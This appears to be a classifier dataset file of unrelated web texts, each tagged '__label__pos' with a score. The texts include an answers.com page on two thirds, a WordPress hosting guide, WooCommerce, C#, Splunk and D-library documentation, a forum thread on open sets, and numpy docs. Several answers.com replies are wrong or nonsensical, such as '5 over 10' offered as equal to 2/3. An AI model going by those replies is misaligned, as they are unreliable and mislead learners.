answersLogoWhite 0 Best Answer 2/3 .666 and 66% User Avatar Wiki User 2012-05-15 21:40:45 This answer is: 🙏 0 🤨 0 😮 0 User Avatar More answers User Avatar Anonymous Lvl 1 2020-06-17 14:33:37 2/3 User Avatar Add your answer: Earn +20 pts Q: How do you show two third in two different ways? Write your answer... Submit Related questions How do you show one third in two different ways? You can show it in many different ways. 1/3 2/6 3/9 4/12 etc. If you want to show it in a percentage, it would be about 33% If you want to show it in a decimal, it would be about 0.33 What are two ways in which scientists can show creativity? Scientists show creativity by expirimenting in different ways. How do you show one tenth in two different ways? 1/10 &amp; 0.1 are two ways to show one tenth How do you show two thirds in two different ways? There's a bunch of different ways, here's some: 2/3 4/6 8/12 0.666... 2:3 2 * 1/3 List two ways in which your teeth are different? list two ways in which our teeth are different What is the product of 117 in two different ways? write the product of 117 two different ways Show two wrong ways to write the symbol of calcium? show two wrong ways to write the symbol of calcium show two different ways to make 17$ using 1 dollar bills ' 5 dollar bills and 10 dollar bills? yw How many ways are there to spell show time? The word show time can be spelled in two ways:showtime and show time. What are Two different ways to show three-fourths is greater than two third? A. Multiply both ratios by their LCM, 12: 3/4 * 12 = 9 2/3 * 12 = 8 B. Convert them to percentages: 3/4 = 75% 2/3 = 66.67% Both show that the first is bigger. What are two ways that modern whales are different from pakicetus and two ways that they are similar? They are dead What are two different ways to get the product of 117? 1 * 117 and -1 * -117 are two ways. What are the identifying features of an isosceles triangle? An isosceles triangle has two equal sides (and a third that is a different measure). It can also be identified by the fact that it has two equal angles and the third is different. The above also mean that two of the three altitudes, medians, etc are equal while the third is different. If the third measure is not different the triangle is equilateral. What are two ways to show the number 69? thhghghd How many ways can you pronounce coupon? it can be pronounced two different ways. How many ways can pronounce coupon? it can be pronounced two different ways. What are two ways mesopotamia and shang-china were similar and two ways they were different? they are the same in politics and social structure, but they are different in politics Which words with hard c can be pronounced two different ways? The word Celtic can be pronounced in two different ways, either as, Keltic or Seltic. What is two ways to show two thirds? 2/3 4/6 How many different ways can you mutiply two whole numbers together to get 36? 5 different ways isn't it How many different ways are there to measure a pulse? there are two different ways, you will find one in your neck and one in your wrist. How can be use run in two different ways and has two different meaning in sentence? Can you run my company while I am on leave? Can you run to my house and call my daughter? The above are two examples of how run can be used in different ways. How many ways can a runner score from third base with two outs? Eight. What two ways to show 2over3? 5 over 10 What are two different ways to multiply? there are two compensation and compatible numbers
__label__pos
1
Skip to content The Ultimate Guide to Finding the Best WordPress Hosting The Ultimate Guide to Finding the Best WordPress Hosting Looking for the best WordPress hosting? This comprehensive guide dives into the world of hosting services, providing insights, expert recommendations, and FAQs to help you make an informed decision. Introduction When it comes to creating a successful website or blog, choosing the right hosting service is crucial. Your website’s speed, security, and overall performance depend on it. With countless options available, finding the best WordPress hosting can be overwhelming. In this guide, we’ll walk you through everything you need to know about WordPress hosting, from understanding the types of hosting to factors to consider before making your choice. Best WordPress Hosting: What Sets It Apart WordPress, a popular content management system (CMS), powers more than 40% of the websites on the internet. Its flexibility and ease of use make it a preferred choice among individuals, businesses, and organizations. To ensure your WordPress-powered site runs seamlessly, it’s essential to choose a hosting service that caters specifically to the platform’s requirements. Types of WordPress Hosting Shared Hosting Shared hosting is like living in an apartment building – you share resources with other residents. It’s a cost-effective option for beginners, but it can lead to slower loading times and limited customization. VPS Hosting (Virtual Private Server) VPS hosting offers more control and resources compared to shared hosting. It’s akin to living in a townhouse – you have your own space, but still share the infrastructure. This option is great for growing websites. Managed WordPress Hosting Managed hosting is like renting a fully serviced villa. The provider takes care of maintenance, backups, and security, allowing you to focus solely on creating content. It’s an excellent choice for those without technical expertise. Dedicated Hosting Dedicated hosting is having a house all to yourself. You get an entire server to host your website, resulting in optimal performance and security. This option is suitable for large websites with high traffic. Cloud Hosting Cloud hosting is akin to staying in a luxury resort. Your website is hosted on a network of interconnected servers, ensuring scalability, reliability, and flexibility. It’s perfect for websites with fluctuating traffic. Factors to Consider When Choosing WordPress Hosting 1. Speed and Performance: A fast-loading website is crucial for user experience and SEO. Opt for a host with solid infrastructure and SSD storage. 2. Security Features: Look for hosting providers that offer robust security measures, including SSL certificates, firewalls, and malware scanning. 3. Uptime Guarantee: Choose a host with a high uptime guarantee (99.9% or higher) to ensure your website is accessible around the clock. 4. Customer Support: Reliable customer support can save you from technical headaches. 24/7 live chat, phone, and email support are ideal. 5. Scalability: Consider a host that allows easy scalability as your website grows. This prevents the need to migrate to a different host later. 6. Backup and Restore: Regular backups are essential in case of data loss. Choose a host that offers automated backups and easy restoration options. 7. Control Panel: A user-friendly control panel, such as cPanel, makes it easy to manage your website, domains, and emails. Optimizing WordPress for Speed Slow websites lead to high bounce rates and poor user engagement. Here are some tips to optimize your WordPress site for speed: • Use a Lightweight Theme: Choose a minimalistic theme that doesn’t come with excessive design elements and features. • Image Compression: Compress images to reduce their file size without compromising quality. Plugins like Smush can help with this. • Caching: Use caching plugins to store frequently accessed data, reducing the load time for returning visitors. • Content Delivery Network (CDN): CDNs distribute your website’s content across multiple servers globally, improving loading times for users from different locations. FAQs Q: What is the best WordPress hosting for beginners? A: Shared hosting is a great starting point for beginners due to its affordability and user-friendly interface. Hosts like Bluehost and SiteGround offer excellent shared hosting plans. Q: Is managed WordPress hosting worth the cost? A: Managed hosting can be worth it for those who want to focus solely on their content while leaving technical aspects to experts. It’s especially beneficial for non-tech-savvy users. Q: Can I switch hosting providers later? A: Yes, you can switch hosting providers, but it might involve some migration work. Choose a host that offers easy migration assistance. Q: How does cloud hosting differ from traditional hosting? A: Cloud hosting uses a network of interconnected servers, offering better scalability and flexibility compared to traditional hosting on a single server. Q: What is an SSL certificate, and why is it important? A: An SSL certificate encrypts data transmitted between a user’s browser and your website, ensuring secure communication. It’s crucial for user trust and SEO. Q: How can I improve my website’s security? A: Opt for hosting providers that offer features like SSL certificates, firewalls, malware scanning, and regular security updates. Keep your WordPress and plugins updated as well. Conclusion Choosing the best WordPress hosting is a decision that can greatly impact your online presence. By understanding the types of hosting, important factors to consider, and optimization strategies, you’re well-equipped to make an informed choice. Remember, the right hosting service will provide the foundation for a fast, secure, and successful WordPress website. Comparing Top WordPress Hosting Providers With an array of hosting providers available, let’s take a closer look at some of the leading options for WordPress hosting: 1. Bluehost Bluehost is a recommended hosting provider by WordPress itself. It offers easy WordPress installation, a user-friendly interface, and reliable customer support. Their shared hosting plans are great for beginners, while their managed WordPress hosting provides enhanced performance and security. 2. SiteGround SiteGround is known for its exceptional customer support and speed optimization features. They offer various hosting options, including shared, cloud, and managed WordPress hosting. Their unique SuperCacher technology ensures quick loading times. 3. HostGator HostGator provides affordable hosting plans with a focus on scalability. They offer both shared and managed WordPress hosting, along with a user-friendly control panel and a wide range of features. 4. WP Engine WP Engine specializes in managed WordPress hosting, catering to businesses and high-traffic websites. Their hosting plans come with a suite of performance and security features, making them an excellent choice for those who prioritize these aspects. 5. DreamHost DreamHost offers reliable and high-performance WordPress hosting. They provide managed hosting services as well as a user-friendly website builder. Their commitment to sustainability sets them apart from other hosting providers. Tips for Migrating Your WordPress Site If you’re switching hosting providers or upgrading your plan, migrating your WordPress site can seem daunting. Here’s a step-by-step guide to help you navigate the process: 1. Back-Up Your Website: Before anything else, create a backup of your entire website, including files and databases. 2. Choose a Suitable Time: Schedule the migration during your website’s off-peak hours to minimize disruption. 3. Set Up the New Hosting Account: Set up your new hosting account and install WordPress. Some hosts offer migration assistance. 4. Transfer Files and Databases: Transfer your website’s files and databases from the old host to the new one. Plugins like “All-In-One WP Migration” can simplify this step. 5. Update Domain Settings: Point your domain to the new host by updating the DNS settings. 6. Test the New Site: Before directing all traffic to the new host, test the site’s functionality to ensure everything works as expected. 7. Monitor and Troubleshoot: Keep an eye on your website for any issues that may arise post-migration. Address them promptly to ensure a smooth transition. Stay Ahead with Best WordPress Hosting In the competitive online landscape, a well-hosted website can make all the difference. The right hosting provider ensures optimal performance, security, and user experience. By considering your website’s unique needs, understanding the types of hosting available, and conducting thorough research, you can confidently select the best WordPress hosting that aligns with your goals. Remember, investing in high-quality hosting is an investment in the success of your online presence. In conclusion, finding the best WordPress hosting requires a careful assessment of your website’s needs, the types of hosting available, and the features offered by various providers. Taking the time to make an informed decision can significantly impact your website’s performance, security, and overall success. Whether you’re just starting your WordPress journey or looking to enhance your existing site, the right hosting partner can provide the foundation you need to thrive in the digital world. Remember, the world of hosting is dynamic, so periodically reviewing your hosting choice can ensure your website continues to meet your requirements. So, take the plunge, choose the best WordPress hosting, and watch your online presence flourish! Maximizing SEO Benefits with WordPress Hosting When it comes to hosting, it’s not just about speed and security; search engine optimization (SEO) also plays a significant role. Here’s how you can leverage your WordPress hosting for better SEO: 1. Fast Loading Times Google considers page speed a ranking factor. A fast-loading website not only improves the user experience but also boosts your search engine rankings. Opting for a hosting provider with robust infrastructure and performance optimization features can positively impact your site’s SEO. 2. SSL Certificate Having an SSL certificate, indicated by the “https” in the URL, is crucial for website security. Google prioritizes secure websites in its search results, giving you an SEO advantage. 3. Uptime Guarantee Search engines favor websites that are consistently available to users. A hosting provider with a high uptime guarantee ensures that your site remains accessible, contributing to better search engine rankings. 4. Mobile Responsiveness With the mobile-first indexing approach, Google prioritizes the mobile version of your site’s content for indexing and ranking. Make sure your hosting supports responsive design to provide a seamless experience across devices. 5. Content Delivery Network (CDN) A CDN distributes your website’s content across multiple servers worldwide, reducing latency and improving loading times. This not only enhances the user experience but also positively affects your site’s SEO. The Power of Quality Content While selecting the best WordPress hosting is essential, the content remains king. Quality, informative, and engaging content is what keeps visitors on your site and encourages them to explore further. Here’s how to create content that resonates: 1. Keyword Research: Identify relevant keywords related to your niche and incorporate them naturally into your content. This helps search engines understand what your content is about. 2. High-Quality Images: Use high-quality images to enhance your content. Optimize images for the web to ensure they don’t slow down your website’s loading times. 3. Structured Content: Organize your content using headings (H2, H3, etc.) and bullet points. This not only makes your content easy to read but also helps search engines comprehend its structure. 4. Internal and External Links: Include internal links to other relevant pages on your website and external links to reputable sources. This improves the credibility of your content and its SEO. 5. Regular Updates: Keep your content up-to-date with the latest information. Search engines value fresh content, and regular updates can help maintain or improve your search rankings. Conclusion: Your Path to Success In the vast digital landscape, your website’s success hinges on choosing the best WordPress hosting and optimizing your content for both users and search engines. By understanding the nuances of hosting types, evaluating key factors, and implementing effective SEO practices, you’re well on your way to building a robust online presence. Remember, finding the right hosting provider isn’t a one-size-fits-all solution. Consider your website’s unique requirements, growth plans, and the level of technical assistance you need. As your website evolves, periodic evaluations of your hosting choice can ensure you’re always aligned with the latest trends and technologies. So, embark on your journey with the knowledge that your hosting and content choices will serve as the foundation for your digital success. By selecting the best WordPress hosting, creating compelling content, and staying attuned to SEO best practices, you’ll be poised for growth, engagement, and recognition in the online world.
__label__pos
0.555369
Automattic\WooCommerce\Database\Migrations MetaToMetaTableMigrator::classify_update_insert_records()privateWC 1.0 Classify each record on whether to migrate or update. Метод класса: MetaToMetaTableMigrator{} Хуков нет. Возвращает Массив[]. Returns two arrays, first for records to migrate, and second for records to upgrade. Использование // private - только в коде основоного (родительского) класса $result = $this->classify_update_insert_records( $to_migrate, $already_migrated ): array; $to_migrate(массив) (обязательный) Records to migrate. $already_migrated(массив) (обязательный) Records already migrated. Код MetaToMetaTableMigrator::classify_update_insert_records() WC 7.5.1 private function classify_update_insert_records( array $to_migrate, array $already_migrated ): array { $to_update = array(); $to_insert = array(); foreach ( $to_migrate as $entity_id => $rows ) { foreach ( $rows as $meta_key => $meta_values ) { // If there is no corresponding record in the destination table then insert. // If there is single value in both already migrated and current then update. // If there are multiple values in either already_migrated records or in to_migrate_records, then insert instead of updating. if ( ! isset( $already_migrated[ $entity_id ][ $meta_key ] ) ) { if ( ! isset( $to_insert[ $entity_id ] ) ) { $to_insert[ $entity_id ] = array(); } $to_insert[ $entity_id ][ $meta_key ] = $meta_values; } else { if ( 1 === count( $meta_values ) && 1 === count( $already_migrated[ $entity_id ][ $meta_key ] ) ) { if ( $meta_values[0] === $already_migrated[ $entity_id ][ $meta_key ][0]['meta_value'] ) { continue; } if ( ! isset( $to_update[ $entity_id ] ) ) { $to_update[ $entity_id ] = array(); } $to_update[ $entity_id ][ $meta_key ] = array( 'id' => $already_migrated[ $entity_id ][ $meta_key ][0]['id'], // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_value 'meta_value' => $meta_values[0], ); continue; } // There are multiple meta entries, let's find the unique entries and insert. $unique_meta_values = array_diff( $meta_values, array_column( $already_migrated[ $entity_id ][ $meta_key ], 'meta_value' ) ); if ( 0 === count( $unique_meta_values ) ) { continue; } if ( ! isset( $to_insert[ $entity_id ] ) ) { $to_insert[ $entity_id ] = array(); } $to_insert[ $entity_id ][ $meta_key ] = $unique_meta_values; } } } return array( $to_insert, $to_update ); }
__label__pos
0.975737
Untitled avatar user_0623289 csharp 2 months ago 6.4 kB 13 Indexable Never using System.Data; using System.Text.Json; using System.Text.Json.Serialization; using ClosedXML.Excel; public class Document { [JsonPropertyName("documentId")] public int DocumentId { get; set; } [JsonPropertyName("siteName")] public string? SiteName { get; set; } [JsonPropertyName("serviceDate")] public DateTime ServiceDate { get; set; } [JsonPropertyName("templateName")] public string? TemplateName { get; set; } [JsonPropertyName("clientName")] public string? ClientName { get; set; }=""; [JsonPropertyName("clientFName")] public string? ClientFirstName { get; set; } [JsonPropertyName("clientMName")] public string? ClientMiddleName { get; set; } [JsonPropertyName("clientLName")] public string? ClientLastName { get; set; } [JsonPropertyName("dateOfBirth")] public string? DateOfBirth { get; set; } [JsonPropertyName("startTime")] public string? StartTime { get; set; } [JsonPropertyName("endTime")] public string? EndTime { get; set; } [JsonPropertyName("duration")] public string? Duration { get; set; }=""; [JsonPropertyName("shiftName")] public string? ShiftName { get; set; } [JsonPropertyName("docStatus")] public string? DocStatus { get; set; } [JsonPropertyName("staffName")] public string? StaffName { get; set; }=""; [JsonPropertyName("staffFName")] public string? StaffFirstName { get; set; } [JsonPropertyName("staffLName")] public string? StaffLastName { get; set; } [JsonPropertyName("serviceRate")] public string? ServiceRate { get; set; } [JsonPropertyName("clientDiagnosisName")] public string? ClientDiagnosisName { get; set; } [JsonPropertyName("isSigned")] public bool Signed { get; set; } [JsonPropertyName("isLocked")] public bool Locked { get; set; } [JsonPropertyName("authId")] public int AuthId { get; set; } [JsonPropertyName("billingStatusName")] public string? BillingStatusName { get; set; } } class Program { static void Main(string[] args) { string? jsonData; try { jsonData = File.ReadAllText("data.json"); } catch (Exception ex) { Console.WriteLine($"Error reading JSON file: {ex.Message}"); return; } var options = new JsonSerializerOptions { PropertyNameCaseInsensitive = true }; var data = JsonSerializer.Deserialize<List<Document>>(jsonData, options); if (data == null || data.Count == 0) { Console.WriteLine("No data found in JSON file."); return; } using (var workbook = new XLWorkbook()) { var worksheet = workbook.Worksheets.Add("clientData"); var headerRow = worksheet.Row(1); var properties = typeof(Document).GetProperties().ToList(); for (int i = 0; i < properties.Count; i++) { // Console.WriteLine(properties[i].Name); headerRow.Cell(i + 1).Value = properties[i].Name; } for (int rowIndex = 0; rowIndex < data.Count; rowIndex++) { var item = data[rowIndex]; var currentRow = worksheet.Row(rowIndex + 2); for (int colIndex = 0; colIndex < properties.Count; colIndex++) { var propertyValue = properties[colIndex].GetValue(item); var cell = currentRow.Cell(colIndex + 1); if (propertyValue != null) { if (properties[colIndex].PropertyType == typeof(DateTime)) { cell.Value = ((DateTime)propertyValue).ToString("dd-MM-yyyy"); } else if (properties[colIndex].Name == "ServiceRate") { if (decimal.TryParse(propertyValue.ToString(), out decimal rate)) { cell.Value = rate; cell.Style.NumberFormat.Format = "$ #,##0.00"; } }else if (properties[colIndex].Name=="ClientName"){ cell.Value = string.Join(" ", item.ClientFirstName, item.ClientMiddleName, item.ClientLastName); }else if (properties[colIndex].Name=="StaffName"){ cell.Value = string.Join(", ", item.StaffFirstName, item.StaffLastName); }else if(properties[colIndex].Name=="Duration"){ DateTime startTime; DateTime endTime; if (DateTime.TryParse(item.StartTime, out startTime) && DateTime.TryParse(item.EndTime, out endTime)) { cell.Value = $"{startTime.ToString("hh:mm tt")} - {endTime.ToString("hh:mm tt")}"; } } else { cell.Value = propertyValue.ToString(); } } else { cell.Value = string.Empty; } } } worksheet.Columns("Q").Delete(); worksheet.Columns("P").Delete(); worksheet.Columns("K").Delete(); worksheet.Columns("J").Delete(); worksheet.Columns("H").Delete(); worksheet.Columns("G").Delete(); worksheet.Columns("F").Delete(); try { worksheet.Columns().AdjustToContents(); workbook.SaveAs("output.xlsx"); Console.WriteLine("Excel file saved as: output.xlsx"); } catch (Exception ex) { Console.WriteLine($"Error saving Excel file: {ex.Message}"); } } } } Leave a Comment
__label__pos
0.999956
How Can I Manage Salesforce Cases in Slack? November 11, 2021ANALYSIS, RESEARCH AND INSIGHTS, SALES ANALYSIS, TECH STACK ANALYSIS Have you ever wanted to manage cases or trouble tickets in Slack, and additionally input the same data into Salesforce? Then get ready, this one is for you. Before you get started with any project, it’s a good idea to plan. Salesforce structure and object standards do most of the planning for us. We just need to choose the parent object (Account). You can also configure so the case’s Contact is the parent. In this article, we will manage all cases that are attached to a specific account, ‘Acme.’ Abstract process view On a high-level: Anytime a case is created or updated for my subscribed account, I publish it to my chosen Slack channel slackSf5.jpg Step By Step:   1. Install Salesforce app in Slack This is the initial connection to allow Salesforce to talk to Slack. In step 2, we will allow a connection to Slack from Salesforce. This is for that extra layer of security on both sides. Click the Add to Slack URL below: https://slack.com/interop-apps/salesforce/install slackSf2.jpg 2. Install the companion app in Salesforce from Salesforce AppExchange: Don’t worry it comes from the source. It’s official. This is the other side of the connection we set up in step 1. https://appexchange.salesforce.com/appxListingDetaillistingId=a0N3A00000FnD9mUAF slackSf2.jpg 3. Create a specific Slack Channel aligned with your support structure. Account’s Cases to a Slack Channel 1. #apple_SupportCases 2. #acme_SupportCases 3. #acme_BusinessCases 4. Add an object to watch (Cases) and alert from Salesforce to Slack   5. Viola! Real-time notifications of cases in Slack.     slackSf3.jpg If you want to get fancy, you can start to be creative with your flows and naming conventions to assist your subscription use. image.png Like what you just read? There’s more where that came from.
__label__pos
0.894122
Splunk Search How do I get the timechart results for a summary index query? Builder I have a query which uses the summary index and some lookup tables with eval conditions and ends with... | chart count by field_a, field_b ...which is working fine and gives me the statistics. But, when I tried the same query by replacing the "chart count by" with "timechart count by", it gives me an error as follows and doesn't work: error:- Error in 'timechart' command: The argument 'field_b' is invalid. Could anyone explain why the query with timechart doesn't work but the query with chart did? 0 Karma SplunkTrust SplunkTrust @pavanae Is your problem resolved? If so, please accept one of the answers. --- If this reply helps you, an upvote would be appreciated. 0 Karma Explorer The main thing is timechart doesn't let you do include multiple fields in its by clause. Commands like stats and chart do. You can also fake it by concatenating your two fields into one, and using that in timechart: | eval marker=field_a+field_b | timechart count by marker 0 Karma Contributor This is what I usually do, with the only change I concatenate using the period "." symbol to eliminate possible weirdness with it trying to add numeric values together. | eval marker=field_a.field_b | timechart count by marker 0 Karma Champion Since the X axis is time and the Y axis is fielda, field_b is invalid. How's this? (your search)|bin span=XX _time| stats count by _time,field_a, field_b 0 Karma Builder It doesn't give me an error now but I see no results. Looks like _time not working though I see _time on all the summary indexing events 0 Karma Champion What is the state of not functioning? What is set in the _time of the search result? 0 Karma
__label__pos
0.966721
cerealed 0.6.9 Binary serialisation library for D To use this package, run the following command in your project's root directory: Manual usage Put the following dependency into your project's dependences section: cerealed Build Status My DConf 2014 talk mentioning Cerealed. Binary serialisation library for D. Minimal to no boilerplate necessary. Example usage: import cerealed; assert(cerealise(5) == [0, 0, 0, 5]); // returns ubyte[] cerealise!(a => assert(a == [0, 0, 0, 5]))(5); // faster than using the bytes directly assert(decerealise!int([0, 0, 0, 5]) == 5); struct Foo { int i; } const foo = Foo(5); // alternate spelling assert(foo.cerealize.decerealize!Foo == foo); The example below shows off a few features. First and foremost, members are serialised automatically, but can be opted out via the @NoCereal attribute. Also importantly, members to be serialised in a certain number of bits (important for binary protocols) are signalled with the @Bits attribute with a compile-time integer specifying the number of bits to use. struct MyStruct { ubyte mybyte1; @NoCereal uint nocereal1; //won't be serialised @Bits!4 ubyte nibble; @Bits!1 ubyte bit; @Bits!3 ubyte bits3; ubyte mybyte2; } assert(MyStruct(3, 123, 14, 1, 42).cerealise == [ 3, 0xea /*1110 1 010*/, 42]); What if custom serialisation is needed and the default, even with opt-outs, won't work? If an aggregate type defines a member function void accept(C)(ref C cereal) it will be used instead. To get the usual automatic serialisation from within the custom accept, the grainAllMembers member function of Cereal can be called, as shown in the example below. This function takes a ref argument so rvalues need not apply. The function to use on Cereal to marshall or unmarshall a particular value is grain. This is essentially what Cerealiser.~= and Decerealiser.value are calling behind the scenes (and therefore cerealise and decerealise). struct CustomStruct { ubyte mybyte; ushort myshort; void accept(C)(auto ref C cereal) { //do NOT call cereal.grain(this), that would cause an infinite loop cereal.grainAllMembers(this); ubyte otherbyte = 4; //make it an lvalue cereal.grain(otherbyte); } } assert(CustomStruct(1, 2).cerealise == [ 1, 0, 2, 4]); //because of the custom serialisation, passing in just [1, 0, 2] would throw assert([1, 0, 2, 4].decerealise!CustomStruct == CustomStruct(1, 2)); The other option when custom serialisation is needed that avoids boilerplate is to define a void postBlit(C)(ref C cereal) function instead of accept. The marshalling or unmarshalling is done as it would in the absence of customisation, and postBlit is called to fix things up. It is a compile-time error to define both accept and postBlit. Example below. struct CustomStruct { ubyte mybyte; ushort myshort; @NoCereal ubyte otherByte; void postBlit(C)(auto ref C cereal) { //no need to handle mybyte and myshort, already done if(mybyte == 1) { cereal.grain(otherByte); } } } assert(CustomStruct(1, 2).cerealise == [ 1, 0, 2, 4]); assert(CustomStruct(3, 2).cerealise == [ 1, 0, 2]); For more examples of how to serialise structs, check the tests directory or real-world usage in my MQTT broker also written in D. Arrays are by default serialised with a ushort denoting array length followed by the array contents. It happens often enough that networking protocols have explicit length parameters for the whole packet and that array lengths are implicitly determined from this. For this use case, the @RestOfPacket attribute tells cerealed to not add the length parameter. As the name implies, it will "eat" all bytes until there aren't any left. private struct StringsStruct { ubyte mybyte; @RestOfPacket string[] strings; } //no length encoding for the array, but strings still get a length each const bytes = [ 5, 0, 3, 'f', 'o', 'o', 0, 6, 'f', 'o', 'o', 'b', 'a', 'r', 0, 6, 'o', 'h', 'w', 'e', 'l', 'l']; const strs = StringStruct(5, ["foo", "foobar", "ohwell"]); assert(strs.cerealise == bytes); assert(bytes.decerealise!StringsStruct == strs); Derived classes can be serialised via a reference to the base class, but the child class must be registered first: class BaseClass { int a; this(int a) { this.a = a; }} class ChildClass { int b; this(int b) { this.b = b; }} Cereal.registerChildClass!ChildClass; BaseClass obj = ChildClass(3, 7); assert(obj.cerealise == [0, 0, 0, 3, 0, 0, 0, 7]); There is now support for InputRange and OutputRange objects. Examples can be found in the tests directory Advanced Usage Frequently in networking programming, the packets themselves encode the length of elements to follow. This happens often enough that Cerealed has two UDAs to automate this kind of serialisation: @ArrayLength and @LengthInBytes. The former specifies how to get the length of an array (usually a variable) The latter specifies how many bytes the array takes. Examples: struct Packet { ushort length; @ArrayLength("length") ushort[] array; } auto pkt = decerealise!Packet([ 0, 3, //length 0, 1, 0, 2, 0, 3]); //array of 3 ushorts assert(pkt.length == 3); assert(pkt.array == [1, 2, 3]); struct Packet { static struct Header { ubyte ub; ubyte totalLength; } enum headerSize = unalignedSizeof!Header; //2 bytes Header header; @LengthInBytes("totalLength - headerSize") ushort[] array; } auto pkt = decerealise!Packet([ 7, //ub1 6, //totalLength in bytes 0, 1, 0, 2]); //array of 2 ushorts assert(pkt.ub1 == 7); assert(pkt.totalLength == 6); assert(pkt.array == [1, 2]); Authors: • Atila Neves Dependencies: concepts Versions: 0.6.11 2019-Apr-11 0.6.10 2018-Oct-20 0.6.9 2018-Jan-16 0.6.8 2017-Apr-14 0.6.7 2016-Jun-09 Show all 27 versions Download Stats: • 7 downloads today • 65 downloads this week • 410 downloads this month • 26616 downloads total Score: 4.2 Short URL: cerealed.dub.pm
__label__pos
0.676309
Dismiss Notice Join Physics Forums Today! The friendliest, high quality science and math community on the planet! Everyone who loves science is here! I Open interval (set) end points and differentiability. 1. Jul 30, 2016 #1 When we talk about differentiability on a Set X, the set has to be open. And if a set X is open there exists epsilon> 0 where epsilon is in R. Then if x is in X, y=x+ or - epsilon and y is also in X But this contradicts to what i was taught in highschool; end points are excluded in the open interval. Could anyone clarify this for me? Also, since epsilon is arbitrary number, if set it to be infinite then would X be R? (Entire Real number set)   2. jcsd 3. Jul 31, 2016 #2 Stephen Tashi User Avatar Science Advisor That isn't a grammatically correct statement and it isn't the correct definition for "set X is open". A variable representing a single number can't be "set to be infinite" and it can't be set equal to a set of numbers.   4. Jul 31, 2016 #3 pwsnafu User Avatar Science Advisor Let ##X \subset \mathbb{R}##. We say ##X## is an open set if and only if for all ##x \in X## there exists ##\epsilon > 0## such that ##(x-\epsilon, x+\epsilon) \subset X##. The order of the ##\epsilon## and ##x## is important: ##\epsilon## depends on ##x##. This means it is not arbitrary.   5. Jul 31, 2016 #4 fresh_42 User Avatar 2017 Award Staff: Mentor Why? What about ##f: [0,1] \rightarrow \mathbb{R}## with ##f(x) = x## or ##f(x) = \frac{1}{x}##? Why shouldn't we talk about differentiability here?   6. Jul 31, 2016 #5 Stephen Tashi User Avatar Science Advisor It's also clearer to say "for each ##x \in X##" because we aren't insisting that there is a single ##\epsilon## that works for all ##x##.   7. Jul 31, 2016 #6 It is not usually done in analysis books (at least not introductory ones). The question is how we should define differentiability at the boundary. You probably have quite a good idea how to do that, but it does complicate matters somewhat. Furthermore, differentiability at the boundary is almost never needed for elementary analysis results. Also, when we generalize analysis to ##\mathbb{R}^n## it becomes even more difficult to describe differentiability at the boundary. It's not impossible to do it, but it takes some effort which is usually spent in other places. In fact, I know of two good generalizations of differentiability at the boundary, and I'm not sure whether they even are equivalent. I should think a bit about this.   8. Jul 31, 2016 #7 fresh_42 User Avatar 2017 Award Staff: Mentor I basically wanted to animate the OP to think about why an open neighborhood is "needed", and to sharpen his argumentation, because "the set has to be open" isn't correct in this generality. A reflex, if you like. I thought it would help to understand differentials as linear approximations and what approximation really means in this context. (I wonder if any derivation on any ring could be considered a differentiation .... with no metric in sight ...)   9. Jul 31, 2016 #8 You mean in the sense of differential algebra? https://en.wikipedia.org/wiki/Differential_algebra   10. Jul 31, 2016 #9 fresh_42 User Avatar 2017 Award Staff: Mentor 11. Aug 5, 2016 #10 Thanks. And I am sorry for the confusing statements and wording. I sort of understand why we need an "open set" when we define differentiability on a set X. As far as I know, we'd need to define right or left differentiabilty if the set is closed. But here I have two questions 1. I learned in highschool that open intervals exclude end points. But in an open set X, it would include end points and its neighborhood. Are they different in terms of definition? 2. If we consider the boundary points of X, intuitively half of (x-eps,x+eps) would include the interval outside the set X. Do we define (x-eps, x+eps) to be in X because epsilon is small?   12. Aug 5, 2016 #11 fresh_42 User Avatar 2017 Award Staff: Mentor That's correct. No. ##(a,b) = \{x \in \mathbb{R} \, | \, a < x < b \}## is an open set, ##(a,b] = \{x \in \mathbb{R} \, | \, a < x \leq b \}## is neither open nor closed, and ##[a,b] = \{x \in \mathbb{R} \, | \, a \leq x \leq b \}## is a closed interval. What do you mean by "half of ... outside"? We consider an open interval ##(a,b)## in ##X = \mathbb{R}##, a point ##x \in (a,b) \subset X## and a neighborhood ##(x-\epsilon,x+\epsilon) \subset (a,b)## which is entirely within our open set / interval. We then speak of differentiability at (or in) ##x##. The fact that ##(a,b)## is open and ##x \in (a,b)## that is ##a < x < b## guarantees us, that we can always find some neighborhood left and right of ##x## that is still in ##(a,b)## so we must not deal with any boundaries, where e.g. there is no limit from the left if it is the left end point. And we can get as close to ##x## as we like - from both sides.   13. Aug 5, 2016 #12 Oh shoot. I see. Somehow I thought the open set would include the end points.. Thanks. It is so weird. where I got confused of this..   Know someone interested in this topic? Share this thread via Reddit, Google+, Twitter, or Facebook Have something to add? Draft saved Draft deleted Similar Discussions: Open interval (set) end points and differentiability. 1. Open Intervals (Replies: 5) Loading...
__label__pos
0.958738
Previous topic numpy.ma.concatenate Next topic numpy.ma.hstack numpy.ma.dstack numpy.ma.dstack(tup) = <numpy.ma.extras._fromnxfunction_seq object> Stack arrays in sequence depth wise (along third axis). This is equivalent to concatenation along the third axis after 2-D arrays of shape (M,N) have been reshaped to (M,N,1) and 1-D arrays of shape (N,) have been reshaped to (1,N,1). Rebuilds arrays divided by dsplit. This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions concatenate, stack and block provide more general stacking and concatenation operations. Parameters: tup : sequence of arrays The arrays must have the same shape along all but the third axis. 1-D or 2-D arrays must have the same shape. Returns: stacked : ndarray The array formed by stacking the given arrays, will be at least 3-D. See also stack Join a sequence of arrays along a new axis. vstack Stack along first axis. hstack Stack along second axis. concatenate Join a sequence of arrays along an existing axis. dsplit Split array along third axis. Notes The function is applied to both the _data and the _mask, if any. Examples >>> a = np.array((1,2,3)) >>> b = np.array((2,3,4)) >>> np.dstack((a,b)) array([[[1, 2], [2, 3], [3, 4]]]) >>> a = np.array([[1],[2],[3]]) >>> b = np.array([[2],[3],[4]]) >>> np.dstack((a,b)) array([[[1, 2]], [[2, 3]], [[3, 4]]])
__label__pos
0.719451
